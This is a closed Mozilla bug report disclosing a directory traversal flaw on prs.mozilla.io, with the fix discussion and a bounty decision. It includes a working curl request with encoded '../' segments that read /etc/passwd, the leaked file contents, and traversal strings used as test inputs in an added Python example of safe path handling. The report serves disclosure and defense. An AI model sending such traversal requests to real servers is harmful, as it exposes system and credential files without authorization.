Closed Bug 1264539 Opened 9 years ago Closed 9 years ago

Directory Traversal on prs.mozilla.io

Categories

(Websites :: Other, defect)

Production
defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: griffin.francis.1993, Assigned: peterbe)

Details

(Keywords: reporter-external, sec-high, wsec-fileinclusion)

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36

Steps to reproduce:

    curl -i -s -k -X 'GET' \
        -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' \
        'http://prs.mozilla.io/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'

Actual results:

We are able to read files from the webserver. Output returned from /etc/passwd:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    u54795:x:54795:54795:,,,:/app:/bin/bash
    dyno:x:54795:54795:,,,:/app:/bin/bash

Expected results:

Code should be sanitised to protect against Local File Inclusion attacks.
:peterbe -- do you know where the best place to send this is? The project is housed in your repo, so I'm assigning you unless you happen to know where it should go instead. Thanks!
Assignee: nobody → peterbe
Status: UNCONFIRMED → NEW
Ever confirmed: true
https://github.com/peterbe/github-pr-triage/blob/master/app.py#L190 is the offending code. That's a pretty rough mistake; you should never traverse outside of the root directory.
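The rule stated in the comment above, that a file-serving route must never resolve a path outside its document root, as an added example. This is not the project's code and does not reproduce the handler in app.py; the names `resolve_under_root`, `serve` and `make_demo_root` and the sample directory tree are constructed for the demonstration. It uses only the standard library so it runs without Flask; in a Flask app the same containment check is what `flask.send_from_directory` performs (via `werkzeug.utils.safe_join`) and is the drop-in replacement for opening a request-supplied path directly.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under_root(root, requested):
    """Map a URL path onto a file beneath `root`, or return None if it escapes.

    The path is percent-decoded exactly once (a WSGI server hands the route the
    decoded path, so `..%2f` arrives as `../`), joined to the root, and then
    canonicalised with realpath so that `..` segments and symlinks are resolved
    before the containment check, not after. Hypothetical helper name.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        # A NUL byte would truncate the path at the OS level; never pass it on.
        return None
    root_real = os.path.realpath(root)
    # os.path.join discards `root` entirely when the second part is absolute,
    # so strip leading separators before joining.
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/\\")))
    # The canonical path must be the root itself or lie strictly beneath it.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def serve(root, requested):
    """Return (status, body) the way a hardened static-file route would."""
    path = resolve_under_root(root, requested)
    if path is None or not os.path.isfile(path):
        # An escaped path and a missing file look identical to the client:
        # a plain 404, which is also what the fixed site returns.
        return 404, b""
    with open(path, "rb") as fh:
        return 200, fh.read()


def make_demo_root():
    """Build a throwaway document root holding one static file (constructed data)."""
    root = tempfile.mkdtemp(prefix="prs-demo-")
    os.makedirs(os.path.join(root, "static"))
    with open(os.path.join(root, "static", "app.js"), "wb") as fh:
        fh.write(b"console.log('ok');\n")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    # Constructed request paths: legitimate, normalised-inside-root, traversal,
    # double-encoded traversal, absolute, and NUL-truncation attempts.
    for req in ["static/app.js",
                "static/../static/app.js",
                "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd",
                "%2e%2e/%2e%2e/etc/passwd",
                "/etc/passwd",
                "static/app.js%00.txt"]:
        status, _ = serve(root, req)
        print(f"{status} {req!r} -> {resolve_under_root(root, req)!r}")
```

The order of operations is the point: decode once, join, canonicalise, then compare the real prefix. A string check on the raw URL (for example rejecting a literal `../`) misses the encoded form that the report used, and a check done before `realpath` misses `..` segments and symlinks that only resolve later. Rejecting escapes with the same 404 as a missing file gives a probe nothing to distinguish.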
Peter: Would you be able to assist us with obtaining a fix for this security issue?
Status: NEW → ASSIGNED
haha! Goes to show how much Flask I know :) The site is a personal site-project but it's hosted on a Mozilla Heroku account.
Summary: Local File Inclusion on prs.mozilla.io → Directory Traversal on prs.mozilla.io
Fixed. However, now that I try to curl `http://prs.mozilla.io` it tries to redirect to `https://prs.mozilla.io` which is not something that's set up. I wonder where that came from.
Status: ASSIGNED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Yeah, I just noticed the same thing...

    $ curl -i -s -k -X 'GET' -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' 'http://prs.mozilla.io/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
    HTTP/1.1 301 MOVED PERMANENTLY
    Connection: keep-alive
    Server: gunicorn/19.4.5
    Date: Thu, 21 Apr 2016 19:51:47 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 369
    Location: https://prs.mozilla.io/../../../../../../../../../../../../../../../../etc/passwd
    Via: 1.1 vegur

Looks like heroku has the SSL cert provisioned for you, but it's not set for your domain.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Two ideas:
1.) It's related to the rev'ing of your deps?
2.) It's something in heroku that says do HTTPS only now, so it's redirecting for you?
Not sure about reopening this. The SSL problem is something else. The security thing is fixed and I was able to reproduce it locally and fix it there. If you take the same curl line but replace the domain with enigmatic-beyond-2991.herokuapp.com it now yields a 404 error instead.
Peter: alright, I'll resolve then. As far as I'm concerned the directory traversal is sorted.
Status: REOPENED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Flags: sec-bounty?
Griffin: This site is not enrolled in the bug bounty. We're in the process of updating the list to include some new sites soon, but this site is not slated to be added in the upcoming update. Eligible sites can be found here => https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs. Thank you for reporting this.
Flags: sec-bounty? → sec-bounty-
Hi Jonathon. Thanks for the response. Any chance I could have this raised for consideration by the panel due to the severity of the issue at hand?
Flags: sec-bounty- → sec-bounty?
Thanks Jonathan much appreciated! :)
This site is out of scope for the bounty program on bounty committee review and this isn't so severe of an issue that we will give a bounty for it even though it is out of scope. Thank you for reporting it to us.
Flags: sec-bounty? → sec-bounty-
Group: websites-security